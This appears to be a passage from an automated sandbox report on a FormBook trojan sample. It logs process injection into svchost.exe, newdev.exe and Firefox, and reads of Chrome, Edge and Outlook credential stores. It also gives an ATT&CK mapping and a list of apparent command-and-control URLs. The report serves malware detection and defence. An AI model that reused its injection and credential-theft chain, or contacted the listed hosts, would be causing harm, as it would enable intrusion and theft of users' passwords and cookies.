Source: C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe	NtProtectVirtualMemory: Direct from: 0x77382F9C	Jump to behavior
Source: C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe	NtSetInformationThread: Direct from: 0x773763F9	Jump to behavior
Source: C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe	NtCreateMutant: Direct from: 0x773835CC	Jump to behavior
Source: C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe	NtNotifyChangeKey: Direct from: 0x77383C2C	Jump to behavior
Source: C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe	NtSetInformationProcess: Direct from: 0x77382C5C	Jump to behavior
Source: C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe	NtCreateUserProcess: Direct from: 0x7738371C	Jump to behavior
Source: C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe	NtQueryInformationProcess: Direct from: 0x77382C26	Jump to behavior
Source: C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe	NtResumeThread: Direct from: 0x77382FBC	Jump to behavior
Source: C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe	NtWriteVirtualMemory: Direct from: 0x7738490C	Jump to behavior
Source: C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe	NtAllocateVirtualMemory: Direct from: 0x77383C9C	Jump to behavior
Source: C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe	NtReadFile: Direct from: 0x77382ADC	Jump to behavior
Source: C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe	NtAllocateVirtualMemory: Direct from: 0x77382BFC	Jump to behavior
Source: C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe	NtDelayExecution: Direct from: 0x77382DDC	Jump to behavior
Source: C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe	NtQuerySystemInformation: Direct from: 0x77382DFC	Jump to behavior
Source: C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe	NtOpenSection: Direct from: 0x77382E0C	Jump to behavior
Source: C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe	NtQueryVolumeInformationFile: Direct from: 0x77382F2C	Jump to behavior
Source: C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe	NtQuerySystemInformation: Direct from: 0x773848CC	Jump to behavior
Source: C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe	NtReadVirtualMemory: Direct from: 0x77382E8C	Jump to behavior
Source: C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe	NtCreateKey: Direct from: 0x77382C6C	Jump to behavior
Source: C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe	NtClose: Direct from: 0x77382B6C
Source: C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe	NtAllocateVirtualMemory: Direct from: 0x773848EC	Jump to behavior
Source: C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe	NtQueryAttributesFile: Direct from: 0x77382E6C	Jump to behavior
Source: C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe	NtSetInformationThread: Direct from: 0x77382B4C	Jump to behavior
Source: C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe	NtQueryInformationToken: Direct from: 0x77382CAC	Jump to behavior
Source: C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe	NtOpenKeyEx: Direct from: 0x77382B9C	Jump to behavior
Source: C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe	NtAllocateVirtualMemory: Direct from: 0x77382BEC	Jump to behavior
Source: C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe	NtDeviceIoControlFile: Direct from: 0x77382AEC	Jump to behavior
Source: C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe	NtCreateFile: Direct from: 0x77382FEC	Jump to behavior
Source: C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe	NtOpenFile: Direct from: 0x77382DCC	Jump to behavior
Source: C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe	NtProtectVirtualMemory: Direct from: 0x77377B2E	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\newdev.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	Section loaded: NULL target: C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	Section loaded: NULL target: C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\newdev.exe

Thread register set: target process: 2872

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\newdev.exe

Thread APC queued: target process: C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\25IvlOVEB1.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 303C008

Jump to behavior

Source: C:\Users\user\Desktop\25IvlOVEB1.exe

Code function: 0_2_000C87B1 LogonUserW,

0_2_000C87B1

Source: C:\Users\user\Desktop\25IvlOVEB1.exe

Code function: 0_2_00073B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00073B3A

Source: C:\Users\user\Desktop\25IvlOVEB1.exe

Code function: 0_2_000748D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_000748D7

Source: C:\Users\user\Desktop\25IvlOVEB1.exe

Code function: 0_2_000D4C27 mouse_event,

0_2_000D4C27

Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\25IvlOVEB1.exe"	Jump to behavior
Source: C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe	Process created: C:\Windows\SysWOW64\newdev.exe "C:\Windows\SysWOW64\newdev.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\25IvlOVEB1.exe

Code function: 0_2_000C7CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_000C7CAF

Source: C:\Users\user\Desktop\25IvlOVEB1.exe

Code function: 0_2_000C874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_000C874B

Source: 25IvlOVEB1.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: CsyVZPSRWzlUG.exe, 00000007.00000002.4049791321.0000000000F11000.00000002.00000001.00040000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000007.00000000.2892451043.0000000000F11000.00000002.00000001.00040000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050655240.00000000010A1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: IProgram Manager
Source: 25IvlOVEB1.exe, CsyVZPSRWzlUG.exe, 00000007.00000002.4049791321.0000000000F11000.00000002.00000001.00040000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000007.00000000.2892451043.0000000000F11000.00000002.00000001.00040000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050655240.00000000010A1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: CsyVZPSRWzlUG.exe, 00000007.00000002.4049791321.0000000000F11000.00000002.00000001.00040000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000007.00000000.2892451043.0000000000F11000.00000002.00000001.00040000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050655240.00000000010A1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: CsyVZPSRWzlUG.exe, 00000007.00000002.4049791321.0000000000F11000.00000002.00000001.00040000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000007.00000000.2892451043.0000000000F11000.00000002.00000001.00040000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050655240.00000000010A1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\25IvlOVEB1.exe

Code function: 0_2_0009862B cpuid

0_2_0009862B

Source: C:\Users\user\Desktop\25IvlOVEB1.exe

Code function: 0_2_000A4E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_000A4E87

Source: C:\Users\user\Desktop\25IvlOVEB1.exe

Code function: 0_2_000B1E06 GetUserNameW,

0_2_000B1E06

Source: C:\Users\user\Desktop\25IvlOVEB1.exe

Code function: 0_2_000A3F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_000A3F3A

Source: C:\Users\user\Desktop\25IvlOVEB1.exe

Code function: 0_2_000749A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_000749A0

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.4049320310.0000000000870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4050165664.0000000004560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2966520608.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2968336091.00000000062B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4050217084.00000000045B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4048784369.0000000000890000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4050246258.0000000002610000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2967226346.0000000003E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\newdev.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\newdev.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: 25IvlOVEB1.exe	Binary or memory string: WIN_81
Source: 25IvlOVEB1.exe	Binary or memory string: WIN_XP
Source: 25IvlOVEB1.exe	Binary or memory string: WIN_XPe
Source: 25IvlOVEB1.exe	Binary or memory string: WIN_VISTA
Source: 25IvlOVEB1.exe	Binary or memory string: WIN_7
Source: 25IvlOVEB1.exe	Binary or memory string: WIN_8
Source: 25IvlOVEB1.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.4049320310.0000000000870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4050165664.0000000004560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2966520608.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2968336091.00000000062B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4050217084.00000000045B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4048784369.0000000000890000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4050246258.0000000002610000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2967226346.0000000003E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Code function: 0_2_000E6283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_000E6283
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Code function: 0_2_000E6747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_000E6747

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	1 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	2 Obfuscated Files or Information	NTDS	116 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	251 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	412 Process Injection	2 Valid Accounts	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	412 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
25IvlOVEB1.exe	46%	Virustotal		Browse
25IvlOVEB1.exe	61%	ReversingLabs	Win32.Trojan.AutoitInject
25IvlOVEB1.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://www.8686206.xyz/Chat/149c999841.html	0%	Avira URL Cloud	safe
http://www.8686206.xyz/Chat/445f999545.html	0%	Avira URL Cloud	safe
http://www.8686206.xyz/Chat/591e999399.html	0%	Avira URL Cloud	safe
http://www.masterqq.pro/3vdc/	0%	Avira URL Cloud	safe
http://www.shipley.group/wfhx/?kPJ4bZ=UOoh4KWgwd2uK2Fv/Y1dgfL/8dbcrZUnUaCbH/KIeaCVkdBdb+xIXB95VKjrucq/x/UHPGjJtfXL4g7pUq+6Gw82pv1ZnniYkrWC0OZFP+5EUlQNbciF2fEf2sN//T48Iuc7ZyI=&cHdXN=988T3LsXMJJH2nc	0%	Avira URL Cloud	safe
http://www.8686206.xyz/Chat/679d799313.html	0%	Avira URL Cloud	safe
http://www.8686206.xyz/macangyou/	0%	Avira URL Cloud	safe
http://www.8686206.xyz/Chat/64f999926.html	0%	Avira URL Cloud	safe
http://www.8686206.xyz/gongdilan/	0%	Avira URL Cloud	safe
http://www.8686206.xyz/jinmeixiang/	0%	Avira URL Cloud	safe
http://www.8686206.xyz/youtianzhenxi/	0%	Avira URL Cloud	safe
http://www.growbamboo.xyz/e948/?cHdXN=988T3LsXMJJH2nc&kPJ4bZ=OI9Cl4brfnKnEU4iz0SiaxRa9h1FDMDvQ4DRdccrsueMHwTXZC0uGTlQqvZMtZjxNZZWYO9eSaARepBsGdBKuQ+lt96Nu4y5aB841AjeaGyZFFzppkHuNwNXfZrWKvYHi/gwd9U=	0%	Avira URL Cloud	safe
http://www.8686206.xyz/xiaoxiyou/	0%	Avira URL Cloud	safe
http://www.8686206.xyz/yuantianmeiying/	0%	Avira URL Cloud	safe
http://www.8686206.xyz/Chat/022b799970.html	0%	Avira URL Cloud	safe
http://www.8686206.xyz/Chat/699e999291.html	0%	Avira URL Cloud	safe
http://www.shipley.group/wfhx/	0%	Avira URL Cloud	safe
http://www.8686206.xyz/	0%	Avira URL Cloud	safe
http://www.growbamboo.xyz	0%	Avira URL Cloud	safe
http://www.8686206.xyz/sanshangyouya/	0%	Avira URL Cloud	safe
http://www.8686206.xyz/Chat/664e999326.html	0%	Avira URL Cloud	safe
http://www.8686206.xyz/template/news/newsblue/css/base.css	0%	Avira URL Cloud	safe
http://www.8686206.xyz/cangjingkong/	0%	Avira URL Cloud	safe
http://www.8686206.xyz/xiaodaonan/	0%	Avira URL Cloud	safe
http://www.8686206.xyz/Chat/791b999199.html	0%	Avira URL Cloud	safe
http://www.8686206.xyz/Chat/642b499353.html	0%	Avira URL Cloud	safe
http://www.8686206.xyz/Chat/369a999621.html	0%	Avira URL Cloud	safe
http://www.8686206.xyz/yingmulin/	0%	Avira URL Cloud	safe
http://www.8686206.xyz/xidaoailiw/	0%	Avira URL Cloud	safe
http://www.8686206.xyz/shangyuanruisui/	0%	Avira URL Cloud	safe
http://www.8686206.xyz/shiyinnailan/	0%	Avira URL Cloud	safe
http://www.8686206.xyz/Chat/479b699514.html	0%	Avira URL Cloud	safe
http://www.8686206.xyz/lingmuxinchun/	0%	Avira URL Cloud	safe
http://www.8686206.xyz/Chat/203f999787.html	0%	Avira URL Cloud	safe
http://www.8686206.xyz/micangsuixiang/	0%	Avira URL Cloud	safe
http://www.dadu89.org/4e0r/?kPJ4bZ=QT7390Zj1CMJ3HXZrGeN4EAmJbS0Q78DLI8P1UXKji+VvkgG1NYkqFCcU0D6dMabZFhcgMAZgOWRTpEkDoRZObnAtKSbK/tYjp8uZanJfEmCFVgpAUq3InqUAbbh39nPBUu+z58=&cHdXN=988T3LsXMJJH2nc	0%	Avira URL Cloud	safe
http://www.masterqq.pro/3vdc/?cHdXN=988T3LsXMJJH2nc&kPJ4bZ=vh8Uzz9OV8fhtH1meqE382RNszCOVpONbZRjfq/B9uLstFCNE3abmEu4DqeFZKdG1EFxV7BY8Pk1G/TVKAGyDG9O4gm487ojHWjIBSjIyrwvajxFI/Xm2dfZY0oucSMge7jdbTw=	0%	Avira URL Cloud	safe
http://www.8686206.xyz/Chat/722f499273.html	0%	Avira URL Cloud	safe
http://www.8686206.xyz/longzeluola/	0%	Avira URL Cloud	safe
http://www.8686206.xyz/ee0m/?cHdXN=988T3LsXMJJH2nc&kPJ4bZ=NHwLdo+0jCxtc5CMzIw414F1hBe8Rgh0gZLzRNbcc711dto5H4xmohMbIzAu7+z3xUnofEY5EO/2HGiLPESvf5/iyPfqyBnB3f9+h0VfvTzsaTNCRAbWAe36t302UentalrYUm4=	0%	Avira URL Cloud	safe
http://www.8686206.xyz/dongyuefeng/	0%	Avira URL Cloud	safe
http://www.8686206.xyz/Chat/901d999089.html	0%	Avira URL Cloud	safe
http://www.8686206.xyz/shuiyechaoyang/	0%	Avira URL Cloud	safe
http://www.8686206.xyz/xiaozaochuanlianzi/	0%	Avira URL Cloud	safe
http://www.8686206.xyz/fengjianyoumei/	0%	Avira URL Cloud	safe
http://www.8686206.xyz/Chat/000c999990.html	0%	Avira URL Cloud	safe
http://www.8686206.xyz/sitemap.xml	0%	Avira URL Cloud	safe
http://www.8686206.xyz/gaoqiaoshengzi/	0%	Avira URL Cloud	safe
http://www.dadu89.org/4e0r/	0%	Avira URL Cloud	safe
http://www.8686206.xyz/Chat/175d999815.html	0%	Avira URL Cloud	safe
http://www.8686206.xyz/kuisi/	0%	Avira URL Cloud	safe
http://www.8686206.xyz/Chat/29d999961.html	0%	Avira URL Cloud	safe
http://www.8686206.xyz/Chat/198c999792.html	0%	Avira URL Cloud	safe
http://www.8686206.xyz/Chat/689f999301.html	0%	Avira URL Cloud	safe
http://www.8686206.xyz/lingcunailid/	0%	Avira URL Cloud	safe
http://www.8686206.xyz/Chat/167c999823.html	0%	Avira URL Cloud	safe
http://www.growbamboo.xyz/e948/	0%	Avira URL Cloud	safe
http://www.8686206.xyz/taoguhuilixiangx/	0%	Avira URL Cloud	safe
http://www.8686206.xyz/xidaoaili/	0%	Avira URL Cloud	safe
